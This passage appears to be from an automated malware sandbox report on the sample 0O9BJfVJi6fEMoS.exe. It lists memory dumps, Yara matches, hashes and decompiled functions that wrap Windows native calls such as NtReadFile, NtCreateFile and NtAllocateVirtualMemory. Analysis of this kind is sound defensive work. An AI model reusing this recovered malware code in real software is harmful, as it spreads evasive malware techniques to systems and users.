                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ad67f09881bcd4f68aed527e1feb2a654461f117187167a4b48b7036db0c5acc
                                                                          • Instruction ID: ff121e9e1dc6b9339df75cd8d56a84c959d0066b8aa5286df074ab0c0ad32e83
                                                                          • Opcode Fuzzy Hash: ad67f09881bcd4f68aed527e1feb2a654461f117187167a4b48b7036db0c5acc
                                                                          • Instruction Fuzzy Hash: 55C048302806088FCA84EBA8D549A6873E8AF48626B8500E6A60D8B222DA35A8018B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0103F2D0, Relevance: .3, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 81f99d6801a8e215afdbf759960d336f1ad053fbb0ef06a8e5ad1c19f9f033fc
                                                                          • Instruction ID: 03a39cfd397d164e1efe3c2e5195d626ea906bfe6a56fccdb660a7dbdd17bbea
                                                                          • Opcode Fuzzy Hash: 81f99d6801a8e215afdbf759960d336f1ad053fbb0ef06a8e5ad1c19f9f033fc
                                                                          • Instruction Fuzzy Hash: F31293F14117468BE730CF65ED9828A3BB1B745328F904208D2E16FAE9D7BE154ACF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103D20C, Relevance: .3, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 01d0c8ec6a4fad9296dcc5c08144bf5b7ab092edb8db4599ffe1000140177b40
                                                                          • Instruction ID: f1d091e359eb875ad05505006d3e86d110ddcaf3efd73c43a66cea84e18e6d61
                                                                          • Opcode Fuzzy Hash: 01d0c8ec6a4fad9296dcc5c08144bf5b7ab092edb8db4599ffe1000140177b40
                                                                          • Instruction Fuzzy Hash: EFA17D32E0021A8FCF05DFA5C8445DEBBF6FFD5300B1585AAE945AB261EB71E905CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103F2C0, Relevance: .2, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4735607ff19e8d2252a3f3192d0fc87593786a63753d6a724f624b1a6a24f09e
                                                                          • Instruction ID: 1e2015270db019f8ceb21d627d3aae4d49a61349c0243768fa762017f298422b
                                                                          • Opcode Fuzzy Hash: 4735607ff19e8d2252a3f3192d0fc87593786a63753d6a724f624b1a6a24f09e
                                                                          • Instruction Fuzzy Hash: A2C1FCF18117468BE720CF65EC9828A7BB1FB85328F514308D1A16BAD9D7BE154ACF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: 0O9BJfVJi6fEMoS.exe PID: 3492 Parent PID: 7028 0O9BJfVJi6fEMoS.exeCOMMON

                                                                          Executed Functions

                                                                          Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 21%
                                                                          			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}







                                                                          0x00418262
                                                                          0x00418263
                                                                          0x0041826f
                                                                          0x00418277
                                                                          0x00418282
                                                                          0x0041829d
                                                                          0x004182a5
                                                                          0x004182a9

                                                                          APIs
                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B=A$B=A
                                                                          • API String ID: 2738559852-2767357659
                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418262, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 21%
                                                                          			E00418262() {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;

				asm("in al, dx");
				_t13 =  *((intOrPtr*)(_t31 + 8));
				_t29 =  *((intOrPtr*)(_t31 + 8)) + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 = _t31 + 0x24; // 0x413d42
				_t12 = _t31 + 0xc; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12,  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14)),  *((intOrPtr*)(_t31 + 0x18)),  *((intOrPtr*)(_t31 + 0x1c)),  *((intOrPtr*)(_t31 + 0x20)),  *_t6,  *((intOrPtr*)(_t31 + 0x28)),  *((intOrPtr*)(_t31 + 0x2c)), _t28); // executed
				return _t18;
			}








                                                                          0x00418262
                                                                          0x00418263
                                                                          0x0041826f
                                                                          0x00418277
                                                                          0x00418282
                                                                          0x0041829d
                                                                          0x004182a5
                                                                          0x004182a9

                                                                          APIs
                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B=A$B=A
                                                                          • API String ID: 2738559852-2767357659
                                                                          • Opcode ID: 9340c6c6844d71d3a21144cda5ee9e2f0de6c4e07406845e5e07d3b7f5dffe66
                                                                          • Instruction ID: 39fba8ccfcfdf2114cf77b5d4d3027c7222cf4f28ad7b27435cd5bf11a5a3f3d
                                                                          • Opcode Fuzzy Hash: 9340c6c6844d71d3a21144cda5ee9e2f0de6c4e07406845e5e07d3b7f5dffe66
                                                                          • Instruction Fuzzy Hash: A7F0B7B2200108AFCB14DF99DC80EEB77A9EF8C354F158249BA1DD7241DA30E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                          0x00409b2c
                                                                          0x00409b2f
                                                                          0x00409b34
                                                                          0x00409b39
                                                                          0x00409b43
                                                                          0x00409b48
                                                                          0x00409b4b
                                                                          0x00409b4d
                                                                          0x00409b55
                                                                          0x00409b5a
                                                                          0x00409b5a
                                                                          0x00409b61
                                                                          0x00409b69
                                                                          0x00409b6c
                                                                          0x00409b6e
                                                                          0x00409b82
                                                                          0x00000000
                                                                          0x00409b84
                                                                          0x00409b8a
                                                                          0x00409b3e
                                                                          0x00409b3e
                                                                          0x00409b3e

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004181AC, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E004181AC(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("adc eax, 0x553db7cb");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                          0x004181ac
                                                                          0x004181b3
                                                                          0x004181bf
                                                                          0x004181c7
                                                                          0x004181fd
                                                                          0x00418201

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 8022ee00e791d6ba6cdeb9f4f36d355c2f975163408fedcc37799d91d1f1187c
                                                                          • Instruction ID: 88a94c6d0c33f6d0ee123ca5286cf39aca6a226878f11a5cf3f012dbd39277e5
                                                                          • Opcode Fuzzy Hash: 8022ee00e791d6ba6cdeb9f4f36d355c2f975163408fedcc37799d91d1f1187c
                                                                          • Instruction Fuzzy Hash: 1DF0B2B6200208ABCB48CF88DC95EEB77A9AF8C754F158248FA0D97241D630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                          0x004181bf
                                                                          0x004181c7
                                                                          0x004181fd
                                                                          0x00418201

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                          0x0041839f
                                                                          0x004183a7
                                                                          0x004183c9
                                                                          0x004183cd

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                          0x004182e3
                                                                          0x004182e6
                                                                          0x004182ef
                                                                          0x004182f7
                                                                          0x00418305
                                                                          0x00418309

                                                                          APIs
                                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004182DA(void* __ebx, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t14;

				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x409733
				E00418DB0(_t14, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}





                                                                          0x004182e3
                                                                          0x004182e6
                                                                          0x004182ef
                                                                          0x004182f7
                                                                          0x00418305
                                                                          0x00418309

                                                                          APIs
                                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 3650b31fe86281201d6f97924ed055f55670177cbf47926ac457e85a907a4de5
                                                                          • Instruction ID: a45fe720f35687527d4960da2fc7e44149292638a9d4a5bd425c4eb29278dd16
                                                                          • Opcode Fuzzy Hash: 3650b31fe86281201d6f97924ed055f55670177cbf47926ac457e85a907a4de5
                                                                          • Instruction Fuzzy Hash: 39D0C2B90092C04FCB11EEB4A5C14C67B40EE912183245A8ED8A40B607C5789205A291
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 41837b7e177afe04ab7f1f7c95e7a59379d69bcb30ece751549f2ac98b54ec4f
                                                                          • Instruction ID: 922af6c13fe4ab4c753314a1122c97f06da693d1fa3a93f63f82a4430d1f0842
                                                                          • Opcode Fuzzy Hash: 41837b7e177afe04ab7f1f7c95e7a59379d69bcb30ece751549f2ac98b54ec4f
                                                                          • Instruction Fuzzy Hash: 2B9002B120100402D14075998805B471009A7D0341F51C111E5054558EC6998DD576B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b9a3b9194258664c82366ab4667228774688caab0f3e84e24e9e194fb6cb4de8
                                                                          • Instruction ID: 13da71eb8cc9b960db70e576f2471b67f79c953cd17d3ba2c628307ed3ccaf2d
                                                                          • Opcode Fuzzy Hash: b9a3b9194258664c82366ab4667228774688caab0f3e84e24e9e194fb6cb4de8
                                                                          • Instruction Fuzzy Hash: EA9002A134100442D10075998815F071009E7E1341F51C115E1054558DC659CC527176
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a3f3cb8fa888bb296391f69e213dc134b428e32774b9f415d4aa3c5e2cc9a0eb
                                                                          • Instruction ID: ce1dda25d2cfa2b72422c01081376bb8d42b4f4ea9d7348231de1486818895db
                                                                          • Opcode Fuzzy Hash: a3f3cb8fa888bb296391f69e213dc134b428e32774b9f415d4aa3c5e2cc9a0eb
                                                                          • Instruction Fuzzy Hash: 2F90027120100413D11175998905B07100DA7D0281F91C512E041455CDD6968952B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4670041b845f933df220b6e4904897295dbe1212e06636c27a13a9c520ab7cc2
                                                                          • Instruction ID: a9ef6aca1d53395e399851f7fbf89000473f142a28b50608c1c5fb67dc884792
                                                                          • Opcode Fuzzy Hash: 4670041b845f933df220b6e4904897295dbe1212e06636c27a13a9c520ab7cc2
                                                                          • Instruction Fuzzy Hash: DF900261242041525545B5998805907500AB7E0281791C112E1404954CC5669856E671
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a9ac035ff6cb4edfca267c27bc8a704a602719f1c86e60f286a6218f9682d109
                                                                          • Instruction ID: 4066b758d1fbf89edc469d53d385be5dd2df327900f2dfeaea64d89535bb6ef1
                                                                          • Opcode Fuzzy Hash: a9ac035ff6cb4edfca267c27bc8a704a602719f1c86e60f286a6218f9682d109
                                                                          • Instruction Fuzzy Hash: FB90026160100502D10175998805A17100EA7D0281F91C122E1014559ECA658992B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: db51a2c38e90bd8aad8f7a4207b25aab6122608b457419146e33924044285ea1
                                                                          • Instruction ID: 90dfc280d74a28a134dc63b325019e88fe6261eddea6c6f281f862ef2fd190f9
                                                                          • Opcode Fuzzy Hash: db51a2c38e90bd8aad8f7a4207b25aab6122608b457419146e33924044285ea1
                                                                          • Instruction Fuzzy Hash: 2F90026121180042D20079A98C15F071009A7D0343F51C215E0144558CC95588616571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: cadec1e7a89871ade581bfdac95f3a3a6a7dcef0761014f30b4332c9817e0f93
                                                                          • Instruction ID: bdec2d213434b16ee21bc440658db46dfe40192f9bb4e04014423833fe225da4
                                                                          • Opcode Fuzzy Hash: cadec1e7a89871ade581bfdac95f3a3a6a7dcef0761014f30b4332c9817e0f93
                                                                          • Instruction Fuzzy Hash: EE90026160100042414075A9CC45D075009BBE1251751C221E0988554DC599886566B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f97ba3001c0c512a2055322f4d978ea40ee4477f2a9ed533215a943a94e841dc
                                                                          • Instruction ID: 7791a8f40c2895bb0619bee2c37eda7c184d0cc589dbfd1a682b2e620d854344
                                                                          • Opcode Fuzzy Hash: f97ba3001c0c512a2055322f4d978ea40ee4477f2a9ed533215a943a94e841dc
                                                                          • Instruction Fuzzy Hash: 3590027120140402D10075998C15B0B1009A7D0342F51C111E1154559DC665885175B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4dac912d4a0b525f4c1c155f9467b23e8d05fb79d0c90645d875176a2cd513db
                                                                          • Instruction ID: 81e7916ec7f1c28abf287a845fee2f414aa648bcba8ba7886f9c8e69b42ce78a
                                                                          • Opcode Fuzzy Hash: 4dac912d4a0b525f4c1c155f9467b23e8d05fb79d0c90645d875176a2cd513db
                                                                          • Instruction Fuzzy Hash: 3E900265211000030105B9994B05907104AA7D5391351C121F1005554CD66188616171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 29eaa16594320ed41b8c5f9419d65cb5ac9acfd12d946dd0ec5dcd18b5beb7ba
                                                                          • Instruction ID: 23563422be09b0e877fe92a6c200b243b9eca877a572d5e08e933c50edf528f1
                                                                          • Opcode Fuzzy Hash: 29eaa16594320ed41b8c5f9419d65cb5ac9acfd12d946dd0ec5dcd18b5beb7ba
                                                                          • Instruction Fuzzy Hash: 409002A120200003410575998815A17500EA7E0241B51C121E1004594DC56588917175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6166e1f0af71b442d31e8143365bd762be77fb81d9116ea7183f392bd7ae2201
                                                                          • Instruction ID: 5dd14ad75f46ad5cb7d2dfa6801b169bff0f505fc5742f2afb8fb739779c639c
                                                                          • Opcode Fuzzy Hash: 6166e1f0af71b442d31e8143365bd762be77fb81d9116ea7183f392bd7ae2201
                                                                          • Instruction Fuzzy Hash: 0390027120100402D10079D99809A471009A7E0341F51D111E5014559EC6A588917171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
